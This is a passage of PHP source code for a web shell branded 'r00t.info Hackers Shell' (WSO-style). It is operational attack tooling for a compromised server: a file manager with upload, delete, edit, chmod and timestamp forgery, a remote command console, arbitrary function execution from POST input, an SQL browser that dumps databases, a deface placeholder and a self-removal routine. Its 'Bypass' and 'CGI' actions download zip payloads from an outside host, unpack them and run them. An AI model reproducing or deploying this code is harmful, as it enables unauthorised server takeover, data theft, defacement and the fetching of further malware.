\'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select>&nbsp;\r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/>&nbsp;\r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= \' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&amp;\r\nwidth=260&amp;\r\ncolorsche\r\nme=light&amp;\r\nshow_faces=true&amp;\r\nborder_color=\r\n%23fff&amp;\r\nstream=false&amp;\r\nheader=false&amp;\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 